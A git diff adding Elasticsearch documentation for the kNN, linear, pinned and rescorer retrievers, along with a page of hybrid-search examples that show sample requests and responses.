-### Restrictions on search parameters when specifying a retriever [retriever-restrictions]
-
-When a retriever is specified as part of a search, the following elements are not allowed at the top-level:
-
-* [`query`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#request-body-search-query)
-* [`knn`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-api-knn)
-* [`search_after`](/reference/elasticsearch/rest-apis/paginate-search-results.md#search-after)
-* [`terminate_after`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#request-body-search-terminate-after)
-* [`sort`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-sort-param)
-* [`rescore`](/reference/elasticsearch/rest-apis/filter-search-results.md#rescore) use a [rescorer retriever](#rescorer-retriever) instead
 
+- [RRF with the multi-field query format](retrievers/retrievers-examples.md#retrievers-examples-rrf-multi-field-query-format)
+- [Linear retriever with the multi-field query format](retrievers/retrievers-examples.md#retrievers-examples-linear-multi-field-query-format)
\ No newline at end of file
diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/knn-retriever.md b/docs/reference/elasticsearch/rest-apis/retrievers/knn-retriever.md
new file mode 100644
index 0000000000000..12da522214383
--- /dev/null
+++ b/docs/reference/elasticsearch/rest-apis/retrievers/knn-retriever.md
@@ -0,0 +1,109 @@
+---
+applies_to:
+  stack: all
+  serverless: ga
+---
+
+# kNN retriever [knn-retriever]
+
+A kNN retriever returns top documents from a [k-nearest neighbor search (kNN)](docs-content://solutions/search/vector/knn.md).
+
+
+## Parameters [knn-retriever-parameters]
+
+`field`
+: (Required, string)
+
+    The name of the vector field to search against. Must be a [`dense_vector` field with indexing enabled](/reference/elasticsearch/mapping-reference/dense-vector.md#index-vectors-knn-search).
+
+
+`query_vector`
+: (Required if `query_vector_builder` is not defined, array of `float`)
+
+    Query vector. Must have the same number of dimensions as the vector field you are searching against. Must be either an array of floats or a hex-encoded byte vector.
+
+
+`query_vector_builder`
+: (Required if `query_vector` is not defined, query vector builder object)
+
+    Defines a [model](docs-content://solutions/search/vector/knn.md#knn-semantic-search) to build a query vector.
+
+
+`k`
+: (Required, integer)
+
+    Number of nearest neighbors to return as top hits. This value must be less than or equal to `num_candidates`.
+
+
+`num_candidates`
+: (Required, integer)
+
+    The number of nearest neighbor candidates to consider per shard. Needs to be greater than `k`, or `size` if `k` is omitted, and cannot exceed 10,000. {{es}} collects `num_candidates` results from each shard, then merges them to find the top `k` results. Increasing `num_candidates` tends to improve the accuracy of the final `k` results. Defaults to `Math.min(1.5 * k, 10_000)`.
+
+
+`filter`
+: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md))
+
+    Query to filter the documents that can match. The kNN search will return the top `k` documents that also match this filter. The value can be a single query or a list of queries. If `filter` is not provided, all documents are allowed to match.
+
+
+`similarity`
+: (Optional, float)
+
+    The minimum similarity required for a document to be considered a match. The calculated similarity value relates to the raw [`similarity`](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-similarity) used, not the document score. The matched documents are then scored according to [`similarity`](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-similarity) and the provided `boost` is applied.
+
+    The `similarity` parameter is the direct vector similarity calculation.
+
+    * `l2_norm`: also known as Euclidean, will include documents where the vector is within the `dims` dimensional hypersphere with radius `similarity` with origin at `query_vector`.
+    * `cosine`, `dot_product`, and `max_inner_product`: Only return vectors where the cosine similarity or dot-product is at least the provided `similarity`.
+
+    Read more here: [knn similarity search](docs-content://solutions/search/vector/knn.md#knn-similarity-search)
+
+
+`rescore_vector` {applies_to}`stack: preview 9.0, ga 9.1`
+: (Optional, object) Apply oversampling and rescoring to quantized vectors.
+
+::::{note}
+Rescoring only makes sense for quantized vectors; when [quantization](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-quantization) is not used, the original vectors are used for scoring. The rescore option is ignored for non-quantized `dense_vector` fields.
+::::
+
+
+`oversample`
+: (Required, float)
+
+    Applies the specified oversample factor to `k` on the approximate kNN search. The approximate kNN search will:
+
+    * Retrieve `num_candidates` candidates per shard.
+    * From these candidates, the top `k * oversample` candidates per shard will be rescored using the original vectors.
+    * The top `k` rescored candidates will be returned.
+
+
+See [oversampling and rescoring quantized vectors](docs-content://solutions/search/vector/knn.md#dense-vector-knn-search-rescoring) for details.
+
+
+## Restrictions [_restrictions_2]
+
+The parameters `query_vector` and `query_vector_builder` cannot be used together.
+
+
+## Example [knn-retriever-example]
+
+```console
+GET /restaurants/_search
+{
+  "retriever": {
+    "knn": { <1>
+      "field": "vector", <2>
+      "query_vector": [10, 22, 77], <3>
+      "k": 10, <4>
+      "num_candidates": 10 <5>
+    }
+  }
+}
+```
+
+1. Configuration for k-nearest neighbor (knn) search, which is based on vector similarity.
+2. Specifies the field name that contains the vectors.
+3. The query vector against which document vectors are compared in the `knn` search.
+4. The number of nearest neighbors to return as top hits. This value must be less than or equal to `num_candidates`.
+5. The size of the initial candidate set from which the final `k` nearest neighbors are selected.
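+
+The optional parameters above compose in a single request. The following is a minimal sketch, not part of the original example set: the `cuisine` field, the `similarity` threshold, and the `oversample` factor are hypothetical placeholders to illustrate how `filter`, `similarity`, and `rescore_vector` fit together.
+
+```console
+GET /restaurants/_search
+{
+  "retriever": {
+    "knn": {
+      "field": "vector",
+      "query_vector": [10, 22, 77],
+      "k": 10,
+      "num_candidates": 100,
+      "filter": {
+        "term": { "cuisine": "austrian" } <1>
+      },
+      "similarity": 36, <2>
+      "rescore_vector": {
+        "oversample": 2.0 <3>
+      }
+    }
+  }
+}
```
+
+1. Only documents matching this filter are eligible as nearest neighbors; the `cuisine` field is a hypothetical example.
+2. Matches must reach this raw vector similarity; its meaning depends on the field's similarity metric, and the value here is illustrative only.
+3. If the field is quantized, the top `k * oversample` candidates per shard are rescored using the original vectors; otherwise this option is ignored.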
diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/linear-retriever.md b/docs/reference/elasticsearch/rest-apis/retrievers/linear-retriever.md
new file mode 100644
index 0000000000000..a0babd1bc9ecc
--- /dev/null
+++ b/docs/reference/elasticsearch/rest-apis/retrievers/linear-retriever.md
@@ -0,0 +1,93 @@
+---
+applies_to:
+  stack: all
+  serverless: ga
+---
+
+# Linear retriever [linear-retriever]
+
+A retriever that normalizes and linearly combines the scores of other retrievers.
+
+
+## Parameters [linear-retriever-parameters]
+
+::::{note}
+Either `query` or `retrievers` must be specified.
+Combining `query` and `retrievers` is not supported.
+::::
+
+`query` {applies_to}`stack: ga 9.1`
+: (Optional, String)
+
+    The query to use when using the [multi-field query format](../retrievers.md#multi-field-query-format).
+
+`fields` {applies_to}`stack: ga 9.1`
+: (Optional, array of strings)
+
+    The fields to query when using the [multi-field query format](../retrievers.md#multi-field-query-format).
+    Fields can include boost values using the `^` notation (e.g., `"field^2"`).
+    If not specified, uses the index's default fields from the `index.query.default_field` index setting, which is `*` by default.
+
+`normalizer` {applies_to}`stack: ga 9.1`
+: (Optional, String)
+
+    The normalizer to use when using the [multi-field query format](../retrievers.md#multi-field-query-format).
+    See [normalizers](#linear-retriever-normalizers) for supported values.
+    Required when `query` is specified.
+
+    ::::{warning}
+    Avoid using `none` as that will disable normalization and may bias the result set towards lexical matches.
+    See [field grouping](../retrievers.md#multi-field-field-grouping) for more information.
+    ::::
+
+`retrievers`
+: (Optional, array of objects)
+
+    A list of sub-retriever configurations whose result sets are merged through a weighted sum.
+    Each configuration can specify its own weight and normalizer.
+
+`rank_window_size`
+: (Optional, integer)
+
+    This value determines the size of the individual result sets per query. A higher value will improve result relevance at the cost of performance.
+    The final ranked result set is pruned down to the search request’s [size](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-size-param).
+    `rank_window_size` must be greater than or equal to `size` and greater than or equal to `1`.
+    Defaults to 10.
+
+`filter`
+: (Optional, [query object or list of query objects](/reference/query-languages/querydsl.md))
+
+    Applies the specified [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to all of the specified sub-retrievers, according to each retriever’s specifications.
+
+Each entry in the `retrievers` array specifies the following parameters:
+
+`retriever`
+: (Required, a `retriever` object)
+
+    Specifies the retriever to compute the top documents for. The retriever will produce `rank_window_size` results, which will later be merged based on the specified `weight` and `normalizer`.
+
+`weight`
+: (Optional, float)
+
+    The weight that each score of this retriever’s top docs will be multiplied by. Must be greater than or equal to 0. Defaults to 1.0.
+
+`normalizer`
+: (Optional, String)
+
+    Specifies how the retriever’s score will be normalized before applying the specified `weight`.
+    See [normalizers](#linear-retriever-normalizers) for supported values.
+    Defaults to `none`.
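+
+For illustration, here is a minimal sketch of the `retrievers` format that combines a lexical and a vector sub-retriever with different weights. The index name, field names, and query vector are hypothetical placeholders:
+
+```console
+GET /my-index/_search
+{
+  "retriever": {
+    "linear": {
+      "retrievers": [
+        {
+          "retriever": {
+            "standard": {
+              "query": { "match": { "title": "elasticsearch" } }
+            }
+          },
+          "weight": 2,
+          "normalizer": "minmax"
+        },
+        {
+          "retriever": {
+            "knn": {
+              "field": "vector",
+              "query_vector": [10, 22, 77],
+              "k": 10,
+              "num_candidates": 50
+            }
+          },
+          "weight": 1.5,
+          "normalizer": "minmax"
+        }
+      ],
+      "rank_window_size": 50
+    }
+  }
+}
```
+
+With `minmax` on both entries, each sub-retriever's scores are first scaled to [0, 1] and only then multiplied by the respective weight, so a document ranked first by both sub-retrievers scores at most `2 * 1 + 1.5 * 1 = 3.5`.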
+ +See also [this hybrid search example](retrievers-examples.md#retrievers-examples-linear-retriever) using a linear retriever on how to independently configure and apply normalizers to retrievers. + +## Normalizers [linear-retriever-normalizers] + +The `linear` retriever supports the following normalizers: + +* `none`: No normalization +* `minmax`: Normalizes scores based on the following formula: + + ``` + score = (score - min) / (max - min) + ``` +* `l2_norm`: Normalizes scores using the L2 norm of the score values diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/pinned-retriever.md b/docs/reference/elasticsearch/rest-apis/retrievers/pinned-retriever.md new file mode 100644 index 0000000000000..572fae25b333f --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/retrievers/pinned-retriever.md @@ -0,0 +1,55 @@ +--- +applies_to: + stack: ga 9.1 + serverless: ga +--- + +# Pinned retriever [pinned-retriever] + +A `pinned` retriever returns top documents by always placing specific documents at the top of the results, with the remaining hits provided by a secondary retriever. + +This retriever offers similar functionality to the [pinned query](/reference/query-languages/query-dsl/query-dsl-pinned-query.md), but works seamlessly with other retrievers. This is useful for promoting certain documents for particular queries, regardless of their relevance score. + +## Parameters [pinned-retriever-parameters] + +`ids` +: (Optional, array of strings) + + A list of document IDs to pin at the top of the results, in the order provided. + +`docs` +: (Optional, array of objects) + + A list of objects specifying documents to pin. Each object must contain at least an `_id` field, and may also specify `_index` if pinning documents across multiple indices. + +`retriever` +: (Optional, retriever object) + + A retriever (for example a `standard` retriever or a specialized retriever such as `rrf` retriever) used to retrieve the remaining documents after the pinned ones. + +Either `ids` or `docs` must be specified. + +## Example using `docs` [pinned-retriever-example-documents] + +```console +GET /restaurants/_search +{ + "retriever": { + "pinned": { + "docs": [ + { "_id": "doc1", "_index": "my-index" }, + { "_id": "doc2" } + ], + "retriever": { + "standard": { + "query": { + "match": { + "title": "elasticsearch" + } + } + } + } + } + } +} +``` diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/rescorer-retriever.md b/docs/reference/elasticsearch/rest-apis/retrievers/rescorer-retriever.md new file mode 100644 index 0000000000000..b9f12e6dce795 --- /dev/null +++ b/docs/reference/elasticsearch/rest-apis/retrievers/rescorer-retriever.md @@ -0,0 +1,123 @@ +--- +applies_to: + stack: all + serverless: ga +--- + +# Rescorer retriever [rescorer-retriever] + +The `rescorer` retriever re-scores only the results produced by its child retriever. For the `standard` and `knn` retrievers, the `window_size` parameter specifies the number of documents examined per shard. + +For compound retrievers like `rrf`, the `window_size` parameter defines the total number of documents examined globally. + +When using the `rescorer`, an error is returned if the following conditions are not met: + +* The minimum configured rescore’s `window_size` is: + + * Greater than or equal to the `size` of the parent retriever for nested `rescorer` setups. + * Greater than or equal to the `size` of the search request when used as the primary retriever in the tree. 
+
+* And the maximum rescore’s `window_size` is:
+
+    * Smaller than or equal to the `size` or `rank_window_size` of the child retriever.
+
+## Parameters [rescorer-retriever-parameters]
+
+`rescore`
+: (Required. [A rescorer definition or an array of rescorer definitions](/reference/elasticsearch/rest-apis/filter-search-results.md#rescore))
+
+    Defines the [rescorers](/reference/elasticsearch/rest-apis/filter-search-results.md#rescore) applied sequentially to the top documents returned by the child retriever.
+
+
+`retriever`
+: (Required. `retriever`)
+
+    Specifies the child retriever responsible for generating the initial set of top documents to be re-ranked.
+
+
+`filter`
+: (Optional. [query object or list of query objects](/reference/query-languages/querydsl.md))
+
+    Applies a [boolean query filter](/reference/query-languages/query-dsl/query-dsl-bool-query.md) to the retriever, ensuring that all documents match the filter criteria without affecting their scores.
+
+
+
+## Example [rescorer-retriever-example]
+
+The `rescorer` retriever can be placed at any level within the retriever tree. The following example demonstrates a `rescorer` applied to the results produced by an `rrf` retriever:
+
+```console
+GET movies/_search
+{
+  "size": 10, <1>
+  "retriever": {
+    "rescorer": { <2>
+      "rescore": {
+        "window_size": 50, <3>
+        "query": { <4>
+          "rescore_query": {
+            "script_score": {
+              "query": {
+                "match_all": {}
+              },
+              "script": {
+                "source": "cosineSimilarity(params.queryVector, 'product-vector_final_stage') + 1.0",
+                "params": {
+                  "queryVector": [-0.5, 90.0, -10, 14.8, -156.0]
+                }
+              }
+            }
+          }
+        }
+      },
+      "retriever": { <5>
+        "rrf": {
+          "rank_window_size": 100, <6>
+          "retrievers": [
+            {
+              "standard": {
+                "query": {
+                  "sparse_vector": {
+                    "field": "plot_embedding",
+                    "inference_id": "my-elser-model",
+                    "query": "films that explore psychological depths"
+                  }
+                }
+              }
+            },
+            {
+              "standard": {
+                "query": {
+                  "multi_match": {
+                    "query": "crime",
+                    "fields": [
+                      "plot",
+                      "title"
+                    ]
+                  }
+                }
+              }
+            },
+            {
+              "knn": {
+                "field": "vector",
+                "query_vector": [10, 22, 77],
+                "k": 10,
+                "num_candidates": 10
+              }
+            }
+          ]
+        }
+      }
+    }
+  }
+}
+```
+
+1. Specifies the number of top documents to return in the final response.
+2. A `rescorer` retriever applied as the final step.
+3. Defines the number of documents to rescore from the child retriever.
+4. The definition of the `query` rescorer.
+5. Specifies the child retriever definition.
+6. Defines the number of documents returned by the `rrf` retriever, which limits the available documents to rescore.
+
diff --git a/docs/reference/elasticsearch/rest-apis/retrievers/retrievers-examples.md b/docs/reference/elasticsearch/rest-apis/retrievers/retrievers-examples.md
new file mode 100644
index 0000000000000..b9dcc24a841ed
--- /dev/null
+++ b/docs/reference/elasticsearch/rest-apis/retrievers/retrievers-examples.md
@@ -0,0 +1,1640 @@
+---
+navigation_title: Examples
+mapped_pages:
+  - https://www.elastic.co/guide/en/elasticsearch/reference/current/_retrievers_examples.html
+applies_to:
+  stack:
+  serverless:
+products:
+  - id: elasticsearch
+---
+
+# Retrievers examples [retrievers-examples]
+
+Learn how to combine different retrievers in these hands-on examples.
+
+
+## Add example data [retrievers-examples-setup]
+
+To begin with, let's create the `retrievers_example` index and add some documents to it.
+We will set `number_of_shards=1` for our examples to ensure consistent and reproducible ordering.
+ +```console +PUT retrievers_example +{ + "settings": { + "number_of_shards": 1 + }, + "mappings": { + "properties": { + "vector": { + "type": "dense_vector", + "dims": 3, + "similarity": "l2_norm", + "index": true, + "index_options": { + "type": "flat" + } + }, + "text": { + "type": "text", + "copy_to": "text_semantic" + }, + "text_semantic": { + "type": "semantic_text" + }, + "year": { + "type": "integer" + }, + "topic": { + "type": "keyword" + }, + "timestamp": { + "type": "date" + } + } + } +} + +POST /retrievers_example/_doc/1 +{ + "vector": [0.23, 0.67, 0.89], + "text": "Large language models are revolutionizing information retrieval by boosting search precision, deepening contextual understanding, and reshaping user experiences in data-rich environments.", + "year": 2024, + "topic": ["llm", "ai", "information_retrieval"], + "timestamp": "2021-01-01T12:10:30" +} + +POST /retrievers_example/_doc/2 +{ + "vector": [0.12, 0.56, 0.78], + "text": "Artificial intelligence is transforming medicine, from advancing diagnostics and tailoring treatment plans to empowering predictive patient care for improved health outcomes.", + "year": 2023, + "topic": ["ai", "medicine"], + "timestamp": "2022-01-01T12:10:30" +} + +POST /retrievers_example/_doc/3 +{ + "vector": [0.45, 0.32, 0.91], + "text": "AI is redefining security by enabling advanced threat detection, proactive risk analysis, and dynamic defenses against increasingly sophisticated cyber threats.", + "year": 2024, + "topic": ["ai", "security"], + "timestamp": "2023-01-01T12:10:30" +} + +POST /retrievers_example/_doc/4 +{ + "vector": [0.34, 0.21, 0.98], + "text": "Elastic introduces Elastic AI Assistant, the open, generative AI sidekick powered by ESRE to democratize cybersecurity and enable users of every skill level.", + "year": 2023, + "topic": ["ai", "elastic", "assistant"], + "timestamp": "2024-01-01T12:10:30" +} + +POST /retrievers_example/_doc/5 +{ + "vector": [0.11, 0.65, 0.47], + "text": "Learn how to spin up a deployment on Elastic Cloud and use Elastic Observability to gain deeper insight into the behavior of your applications and systems.", + "year": 2024, + "topic": ["documentation", "observability", "elastic"], + "timestamp": "2025-01-01T12:10:30" +} + +POST /retrievers_example/_refresh +``` + +Now that we have our documents in place, let’s try to run some queries using retrievers. + + +## Example: Combining query and kNN with RRF [retrievers-examples-combining-standard-knn-retrievers-with-rrf] + +First, let’s examine how to combine two different types of queries: a `kNN` query and a `query_string` query. +While these queries may produce scores in different ranges, we can use Reciprocal Rank Fusion (`rrf`) to combine the results and generate a merged final result list. + +To implement this in the retriever framework, we start with the top-level element: our `rrf` retriever. +This retriever operates on top of two other retrievers: a `knn` retriever and a `standard` retriever. 
Our query structure would look like this: + +```console +GET /retrievers_example/_search +{ + "retriever": { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "query_string": { + "query": "(information retrieval) OR (artificial intelligence)", + "default_field": "text" + } + } + } + }, + { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + }, + "_source": false +} +``` + +This returns the following response based on the final rrf score for each result. + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 0.8333334, + "hits": [ + { + "_index": "retrievers_example", + "_id": "1", + "_score": 0.8333334 + }, + { + "_index": "retrievers_example", + "_id": "2", + "_score": 0.8333334 + }, + { + "_index": "retrievers_example", + "_id": "3", + "_score": 0.25 + } + ] + } +} +``` + +:::: + + + +## Example: Hybrid search with linear retriever [retrievers-examples-linear-retriever] + +A different, and more intuitive, way to provide hybrid search, is to linearly combine the top documents of different retrievers using a weighted sum of the original scores. +Since, as above, the scores could lie in different ranges, we can also specify a `normalizer` that would ensure that all scores for the top ranked documents of a retriever lie in a specific range. + +To implement this, we define a `linear` retriever, and along with a set of retrievers that will generate the heterogeneous results sets that we will combine. +We will solve a problem similar to the above, by merging the results of a `standard` and a `knn` retriever. +As the `standard` retriever’s scores are based on BM25 and are not strictly bounded, we will also define a `minmax` normalizer to ensure that the scores lie in the [0, 1] range. +We will apply the same normalizer to `knn` as well to ensure that we capture the importance of each document within the result set. + +So, let’s now specify the `linear` retriever whose final score is computed as follows: + +```text +score = weight(standard) * score(standard) + weight(knn) * score(knn) +score = 2 * score(standard) + 1.5 * score(knn) +``` + +```console +GET /retrievers_example/_search +{ + "retriever": { + "linear": { + "retrievers": [ + { + "retriever": { + "standard": { + "query": { + "query_string": { + "query": "(information retrieval) OR (artificial intelligence)", + "default_field": "text" + } + } + } + }, + "weight": 2, + "normalizer": "minmax" + }, + { + "retriever": { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + }, + "weight": 1.5, + "normalizer": "minmax" + } + ], + "rank_window_size": 10 + } + }, + "_source": false +} +``` + +This returns the following response based on the normalized weighted score for each result. 
+ +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 3.5, + "hits": [ + { + "_index": "retrievers_example", + "_id": "2", + "_score": 3.5 + }, + { + "_index": "retrievers_example", + "_id": "1", + "_score": 2.3 + }, + { + "_index": "retrievers_example", + "_id": "3", + "_score": 0.1 + } + ] + } +} +``` + +:::: + + +By normalizing scores and leveraging `function_score` queries, we can also implement more complex ranking strategies, such as sorting results based on their timestamps, assign the timestamp as a score, and then normalizing this score to [0, 1]. +Then, we can easily combine the above with a `knn` retriever as follows: + +```console +GET /retrievers_example/_search +{ + "retriever": { + "linear": { + "retrievers": [ + { + "retriever": { + "standard": { + "query": { + "function_score": { + "query": { + "term": { + "topic": "ai" + } + }, + "functions": [ + { + "script_score": { + "script": { + "source": "doc['timestamp'].value.millis" + } + } + } + ], + "boost_mode": "replace" + } + }, + "sort": { + "timestamp": { + "order": "asc" + } + } + } + }, + "weight": 2, + "normalizer": "minmax" + }, + { + "retriever": { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + }, + "weight": 1.5 + } + ], + "rank_window_size": 10 + } + }, + "_source": false +} +``` + +Which would return the following results: + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 4, + "relation": "eq" + }, + "max_score": 3.5, + "hits": [ + { + "_index": "retrievers_example", + "_id": "3", + "_score": 3.5 + }, + { + "_index": "retrievers_example", + "_id": "2", + "_score": 2.0 + }, + { + "_index": "retrievers_example", + "_id": "4", + "_score": 1.1 + }, + { + "_index": "retrievers_example", + "_id": "1", + "_score": 0.1 + } + ] + } +} +``` + +:::: + + +## Example: RRF with the multi-field query format [retrievers-examples-rrf-multi-field-query-format] +```yaml {applies_to} +stack: ga 9.1 +``` + +There's an even simpler way to execute a hybrid search though: We can use the [multi-field query format](/reference/elasticsearch/rest-apis/retrievers.md#multi-field-query-format), which allows us to query multiple fields without explicitly specifying inner retrievers. + +One of the major challenges with hybrid search is normalizing the scores across matches on all field types. +Scores from [`text`](/reference/elasticsearch/mapping-reference/text.md) and [`semantic_text`](/reference/elasticsearch/mapping-reference/semantic-text.md) fields don't always fall in the same range, so we need to normalize the ranks across matches on these fields to generate a result set. +For example, BM25 scores from `text` fields are unbounded, while vector similarity scores from `text_embedding` models are bounded between [0, 1]. +The multi-field query format [handles this normalization for us automatically](/reference/elasticsearch/rest-apis/retrievers.md#multi-field-field-grouping). + +The following example uses the multi-field query format to query every field specified in the `index.query.default_field` index setting, which is set to `*` by default. 
+This default value will cause the retriever to query every field that either: + +- Supports term queries, such as `keyword` and `text` fields +- Is a `semantic_text` field + +In this example, that would translate to the `text`, `text_semantic`, `year`, `topic`, and `timestamp` fields. + +```console +GET /retrievers_example/_search +{ + "retriever": { + "rrf": { + "query": "artificial intelligence" + } + } +} +``` + +This returns the following response based on the final rrf score for each result. + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 0.8333334, + "hits": [ + { + "_index": "retrievers_example", + "_id": "1", + "_score": 0.8333334 + }, + { + "_index": "retrievers_example", + "_id": "2", + "_score": 0.8333334 + }, + { + "_index": "retrievers_example", + "_id": "3", + "_score": 0.25 + } + ] + } +} +``` + +:::: + +We can also use the `fields` parameter to explicitly specify the fields to query. +The following example uses the multi-field query format to query the `text` and `text_semantic` fields. + +```console +GET /retrievers_example/_search +{ + "retriever": { + "rrf": { + "query": "artificial intelligence", + "fields": ["text", "text_semantic"] + } + } +} +``` + +::::{note} +The `fields` parameter also accepts [wildcard field patterns](/reference/elasticsearch/rest-apis/retrievers.md#multi-field-wildcard-field-patterns). +:::: + +This returns the following response based on the final rrf score for each result. + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 0.8333334, + "hits": [ + { + "_index": "retrievers_example", + "_id": "1", + "_score": 0.8333334 + }, + { + "_index": "retrievers_example", + "_id": "2", + "_score": 0.8333334 + }, + { + "_index": "retrievers_example", + "_id": "3", + "_score": 0.25 + } + ] + } +} +``` + +:::: + + +## Example: Linear retriever with the multi-field query format [retrievers-examples-linear-multi-field-query-format] +```yaml {applies_to} +stack: ga 9.1 +``` + +We can also use the [multi-field query format](/reference/elasticsearch/rest-apis/retrievers.md#multi-field-query-format) with the `linear` retriever. 
+It works much the same way as [on the `rrf` retriever](#retrievers-examples-rrf-multi-field-query-format), with a couple key differences: + +- We can use `^` notation to specify a [per-field boost](/reference/elasticsearch/rest-apis/retrievers.md#multi-field-field-boosting) +- We must set the `normalizer` parameter to specify the normalization method used to combine [field group scores](/reference/elasticsearch/rest-apis/retrievers.md#multi-field-field-grouping) + +The following example uses the `linear` retriever to query the `text`, `text_semantic`, and `topic` fields, with a boost of 2 on the `topic` field: + +```console +GET /retrievers_example/_search +{ + "retriever": { + "linear": { + "query": "artificial intelligence", + "fields": ["text", "text_semantic", "topic^2"], + "normalizer": "minmax" + } + } +} +``` + +This returns the following response based on the normalized score for each result: + +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 2.0, + "hits": [ + { + "_index": "retrievers_example", + "_id": "2", + "_score": 2.0 + }, + { + "_index": "retrievers_example", + "_id": "1", + "_score": 1.2 + }, + { + "_index": "retrievers_example", + "_id": "3", + "_score": 0.1 + } + ] + } +} +``` + +:::: + +## Example: Grouping results by year with `collapse` [retrievers-examples-collapsing-retriever-results] + +In our result set, we have many documents with the same `year` value. We can clean this up using the `collapse` parameter with our retriever. This, as with the standard [collapse](/reference/elasticsearch/rest-apis/collapse-search-results.md) feature, +enables grouping results by any field and returns only the highest-scoring document from each group. In this example we’ll collapse our results based on the `year` field. + +```console +GET /retrievers_example/_search +{ + "retriever": { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "query_string": { + "query": "(information retrieval) OR (artificial intelligence)", + "default_field": "text" + } + } + } + }, + { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + }, + "collapse": { + "field": "year", + "inner_hits": { + "name": "topic related documents", + "_source": [ + "year" + ] + } + }, + "_source": false +} +``` + +This returns the following response with collapsed results. 
+ +::::{dropdown} Example response +```console-result +{ + "took": 42, + "timed_out": false, + "_shards": { + "total": 1, + "successful": 1, + "skipped": 0, + "failed": 0 + }, + "hits": { + "total": { + "value": 3, + "relation": "eq" + }, + "max_score": 0.8333334, + "hits": [ + { + "_index": "retrievers_example", + "_id": "1", + "_score": 0.8333334, + "fields": { + "year": [ + 2024 + ] + }, + "inner_hits": { + "topic related documents": { + "hits": { + "total": { + "value": 2, + "relation": "eq" + }, + "max_score": 0.8333334, + "hits": [ + { + "_index": "retrievers_example", + "_id": "1", + "_score": 0.8333334, + "_source": { + "year": 2024 + } + }, + { + "_index": "retrievers_example", + "_id": "3", + "_score": 0.25, + "_source": { + "year": 2024 + } + } + ] + } + } + } + }, + { + "_index": "retrievers_example", + "_id": "2", + "_score": 0.8333334, + "fields": { + "year": [ + 2023 + ] + }, + "inner_hits": { + "topic related documents": { + "hits": { + "total": { + "value": 1, + "relation": "eq" + }, + "max_score": 0.8333334, + "hits": [ + { + "_index": "retrievers_example", + "_id": "2", + "_score": 0.8333334, + "_source": { + "year": 2023 + } + } + ] + } + } + } + } + ] + } +} +``` + +:::: + + + +## Example: Highlighting results based on nested sub-retrievers [retrievers-examples-highlighting-retriever-results] + +Highlighting is now also available for nested sub-retrievers matches. For example, consider the same `rrf` retriever as above, with a `knn` and `standard` retriever as its sub-retrievers. We can specify a `highlight` section, as defined in the [highlighting](/reference/elasticsearch/rest-apis/highlighting.md) documentation, and compute highlights for the top results. + +```console +GET /retrievers_example/_search +{ + "retriever": { + "rrf": { + "retrievers": [ + { + "standard": { + "query": { + "query_string": { + "query": "(information retrieval) OR (artificial intelligence)", + "default_field": "text" + } + } + } + }, + { + "knn": { + "field": "vector", + "query_vector": [ + 0.23, + 0.67, + 0.89 + ], + "k": 3, + "num_candidates": 5 + } + } + ], + "rank_window_size": 10, + "rank_constant": 1 + } + }, + "highlight": { + "fields": { + "text": { + "fragment_size": 150, + "number_of_fragments": 3 + } + } + }, + "_source": false +} +``` + +This would highlight the `text` field, based on the matches produced by the `standard` retriever. The highlighted snippets would then be included in the response as usual, i.e. under each search hit. 
